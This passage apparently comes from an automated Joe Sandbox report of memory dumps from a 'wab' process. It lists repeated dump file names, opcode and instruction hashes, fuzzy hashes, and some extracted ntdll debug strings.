                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 711f1cfbf95890ff563051e94e6b77c33b1c22f19c0d2fc3cc89a437f21193f9
                                          • Instruction ID: 068a2ad3c8a46118163df8d5469272e4c871312b856cf35314d4fbd7da76e8fe
                                          • Opcode Fuzzy Hash: 711f1cfbf95890ff563051e94e6b77c33b1c22f19c0d2fc3cc89a437f21193f9
                                          • Instruction Fuzzy Hash: 0C90027125540403D2507158444474610055BD1305F56C012A51A5534E8759CED56665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a170a238603cc980e578c54cdef6645ff8776afaf261d4f16f46d3a48564609c
                                          • Instruction ID: e62d7797889c9b14290038477c7db3f80aa3145f74eda38571da4cd45c5ed532
                                          • Opcode Fuzzy Hash: a170a238603cc980e578c54cdef6645ff8776afaf261d4f16f46d3a48564609c
                                          • Instruction Fuzzy Hash: EE90022165540503D21171584444616100A5BD1245F96C023A1165535ECB25CA92A131
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ac29425be2050e404585cdb7979f6051e2c08589d859d330eb56a43a4b0c74f
                                          • Instruction ID: 062cdc5d3c19d2c4fed10847ccf064bac7cbc5f30ade723d5ed902710f715ceb
                                          • Opcode Fuzzy Hash: 1ac29425be2050e404585cdb7979f6051e2c08589d859d330eb56a43a4b0c74f
                                          • Instruction Fuzzy Hash: 7590026126540043D2147158444470610455BE2205F56C013A2295534CC629CD615125
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15f6ef280c4278d02be40e949e9547cc40942fdf27a2762344854ed46bcf74c3
                                          • Instruction ID: 2ea3db12f0cf603fe211046b0c03a508737d9f24d3fa058b3dc5ee4a9daabded
                                          • Opcode Fuzzy Hash: 15f6ef280c4278d02be40e949e9547cc40942fdf27a2762344854ed46bcf74c3
                                          • Instruction Fuzzy Hash: EC90026139540443D21071584454B0610059BE2305F56C016E11A5534D8719CD526126
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: deef57c2e9e226e903bc9b8ac96cd52fee7f6411fb58b4a69c0f1b3718f6d287
                                          • Instruction ID: d9dc585e6263c175785ac75bd1f083035133a3ef2db5b5e51ba629457b435a9c
                                          • Opcode Fuzzy Hash: deef57c2e9e226e903bc9b8ac96cd52fee7f6411fb58b4a69c0f1b3718f6d287
                                          • Instruction Fuzzy Hash: 93900221265C0043D31075684C54B0710055BD1307F56C116A0295534CCA15C9615521
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff23ebede6eccce02edf4f983b3e7b1593ef5356ab335e5761e5413b83c29bf9
                                          • Instruction ID: 062ad0049784f20aaf00589528a0b128cef11e0b8382df5e229c99666b6b9550
                                          • Opcode Fuzzy Hash: ff23ebede6eccce02edf4f983b3e7b1593ef5356ab335e5761e5413b83c29bf9
                                          • Instruction Fuzzy Hash: 3A9002216554004342507168888490650057FE2215756C122A0AD9530D8659C9655665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1271aaab8b06ac47926fa7fde93e87b88809c5b430d2ca1be446609efe5d365
                                          • Instruction ID: 39ae0a36b8151d33b1f1eefc15a0e872fb0d1e89a44bfbd682eebd3d6075a5c5
                                          • Opcode Fuzzy Hash: a1271aaab8b06ac47926fa7fde93e87b88809c5b430d2ca1be446609efe5d365
                                          • Instruction Fuzzy Hash: 6890023125580403D2107158484874710055BD1306F56C012A52A5535E8765C9916531
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27306e19d8539c6cb3e6c801ab33a7cee375ec4d661eb26b0525851cc6cbfb97
                                          • Instruction ID: fd5cacfafbf2824d310dcd52ce8d582eee159d8abe28a0916a6f500cd238ce28
                                          • Opcode Fuzzy Hash: 27306e19d8539c6cb3e6c801ab33a7cee375ec4d661eb26b0525851cc6cbfb97
                                          • Instruction Fuzzy Hash: 7F90023125580403D2107158485470B10055BD1306F56C012A12A5535D8725C9516571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 69c40e825f8500679749416eae828a58d8d046fb81d0261be806227ba1e06cba
                                          • Instruction ID: 0c1b4618b86cb676e3ea2bd7022956afee798f1d6e143195dc2826112814753a
                                          • Opcode Fuzzy Hash: 69c40e825f8500679749416eae828a58d8d046fb81d0261be806227ba1e06cba
                                          • Instruction Fuzzy Hash: 7390022129945103D260715C444461650057BE1205F56C022A0955574D8655C9556221
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89d0433520e79fcf1502114836aa8ff339c0557ae1ea03f04fb92046cc167758
                                          • Instruction ID: 2048c4947ad9783dfa215e42ebe01e50069e7b608913645dc42e082b338494b3
                                          • Opcode Fuzzy Hash: 89d0433520e79fcf1502114836aa8ff339c0557ae1ea03f04fb92046cc167758
                                          • Instruction Fuzzy Hash: F7900225275400030255B558064450B14456BD7355396C016F1557570CC721C9655321
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9af233a5903263fc2d92e55b276701e050620073433380e8f1eb83fbf727b517
                                          • Instruction ID: 5859a878fecddf69c4a6eca4a3a77b9115a608558f60df7d171f7f912df880f7
                                          • Opcode Fuzzy Hash: 9af233a5903263fc2d92e55b276701e050620073433380e8f1eb83fbf727b517
                                          • Instruction Fuzzy Hash: 49900225265400030215B558074450710465BD6355356C022F1156530CD721C9615121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 609303d18f898328066f59c03e5d8e300da2f1ceb6915ca71ac08a070cd8fc4b
                                          • Instruction ID: 6544e26a079f1a87b301ac1961ddf24d29cb20772c6fe7b8c72079f55d0d20ae
                                          • Opcode Fuzzy Hash: 609303d18f898328066f59c03e5d8e300da2f1ceb6915ca71ac08a070cd8fc4b
                                          • Instruction Fuzzy Hash: AD9002A1255540934610B2588444B0A55055BE1205B56C017E1195530CC625C9519135
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43608700a8a59891a7ed1546b77472866a2b4cba3bebecbc72d08e154baae718
                                          • Instruction ID: 66768b350a10515c7da7ac512a2a021f3b8c0962377375f8faf4b2194b8b5dfc
                                          • Opcode Fuzzy Hash: 43608700a8a59891a7ed1546b77472866a2b4cba3bebecbc72d08e154baae718
                                          • Instruction Fuzzy Hash: 4D90026125640003421571584454616500A5BE1205B56C022E1155570DC625C9916125
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f5f57e26d2ce337de4034f351738e9a5c857e6c9024f9234f809e066c2e057b
                                          • Instruction ID: 59c7ec8c93d802baac8eaa70a65cda4b694734b21624f875261770ded7b3c961
                                          • Opcode Fuzzy Hash: 7f5f57e26d2ce337de4034f351738e9a5c857e6c9024f9234f809e066c2e057b
                                          • Instruction Fuzzy Hash: 1190023125540803D2907158444464A10055BD2305F96C016A0166634DCB15CB5977A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa572da5f2a66039f2d11129d23a312c3258417f55b66d97552cf78a7b202dae
                                          • Instruction ID: ff94dee8e3e38168a2e26120da7b9c0855b92946d9456fc4f2b746fd8ba1743a
                                          • Opcode Fuzzy Hash: aa572da5f2a66039f2d11129d23a312c3258417f55b66d97552cf78a7b202dae
                                          • Instruction Fuzzy Hash: B390023125944843D25071584444A4610155BD1309F56C012A01A5674D9725CE55B661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d96d5e21b6198706a5b1c9848d8e4435032aeb563382f1611e82a5c3b6f137ed
                                          • Instruction ID: ca5134a9b18b246bfccfdbb068a6f13e9f6aeb2ff91d6297b2e43b699b79d3cd
                                          • Opcode Fuzzy Hash: d96d5e21b6198706a5b1c9848d8e4435032aeb563382f1611e82a5c3b6f137ed
                                          • Instruction Fuzzy Hash: E390023165940803D2607158445474610055BD1305F56C012A0165634D8755CB5576A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: acc6c5b78d99efd5b7fe8d2469f60aceaf70aef53e4f313a6eed025da29b180f
                                          • Instruction ID: 5924801b2e4c77d1422bddb760233f4593260fd5fcbe89ee990808c6f348e0fa
                                          • Opcode Fuzzy Hash: acc6c5b78d99efd5b7fe8d2469f60aceaf70aef53e4f313a6eed025da29b180f
                                          • Instruction Fuzzy Hash: 1E90023125540803D2147158484468610055BD1305F56C012A6165635E9765C9917131
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 24300fbd5c8e0c4a8d266cbb40bd8ac581b0c15bace43f2938f6402a4e1f10a0
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 876450d983b1d690090fc38f82888c4f41ca45dc8a5df30e473d12a8f53f573a
                                          • Instruction ID: d59c42e3e88a7ce1b492ea6259db033eab61a4efd2c63d8d89b12406d1950fdd
                                          • Opcode Fuzzy Hash: 876450d983b1d690090fc38f82888c4f41ca45dc8a5df30e473d12a8f53f573a
                                          • Instruction Fuzzy Hash: 7051F9B7A00156BFCB11DFA9C89497EFBF8BB18200750D169E5B8E7746D274DE408BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 24734655
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 24734787
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 24734725
                                          • ExecuteOptions, xrefs: 247346A0
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 247346FC
                                          • Execute=1, xrefs: 24734713
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 24734742
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 7e20a7798760e02c2db786015514bc1c9965bd247a7c07240ea72e86babbd32b
                                          • Instruction ID: 0141c25062f2a7f275c4c35d02210f0131e59d60b61bd0d51cdf3e2b750cf377
                                          • Opcode Fuzzy Hash: 7e20a7798760e02c2db786015514bc1c9965bd247a7c07240ea72e86babbd32b
                                          • Instruction Fuzzy Hash: F3514B31700A197BEF15ABA4DC99FED77B8EF28302F0100E9E616A7281E7719E418F50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: f3e1c33bb5d0abbbafe2c4aa97d9507edb3bbb5e56ed01d4d14eb8af51458515
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: E281CF70E072498EDB158FE8C890BEEBBF5AF85350F14E65AD870A73D1E7309A408B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 24737B7F
                                          • RTL: Resource at %p, xrefs: 24737B8E
                                          • RTL: Re-Waiting, xrefs: 24737BAC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 930b5431fcdb2b3fdcc97feb321124bce439d0495ed7abc04639ea508f3491ee
                                          • Instruction ID: 698fe8117473733c0eb93d4afa91c6ca39e4901372134a6a930d7158d351c48d
                                          • Opcode Fuzzy Hash: 930b5431fcdb2b3fdcc97feb321124bce439d0495ed7abc04639ea508f3491ee
                                          • Instruction Fuzzy Hash: 374102317017039FD710CE25CC40F6ABBE5EF99B10F010A6DE9AA9B781DB30E9058B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2473728C
                                          Strings
                                          • RTL: Resource at %p, xrefs: 247372A3
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 24737294
                                          • RTL: Re-Waiting, xrefs: 247372C1
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: d873ca2e6170f1d28409284aa5341c21ff89a3f14edf9cfc06eec93b7f889968
                                          • Instruction ID: 2bc56c2cfaee50efc09fc6e7e1fbba7287471d7b9595162031037998613f6250
                                          • Opcode Fuzzy Hash: d873ca2e6170f1d28409284aa5341c21ff89a3f14edf9cfc06eec93b7f889968
                                          • Instruction Fuzzy Hash: E941F032700A02ABD711CE25CD81F5ABBB5FB94B10F104619FAA5AB745DB31E8428BD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: 781c31da09cfcdc36d8f4c08997943bcb775974c2cbb77432dd31525e5a09f94
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: 0891B470E02A159BDB14CF69C881AAEBBE5FF44760F50E51AE974EB3C5D730A941C720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
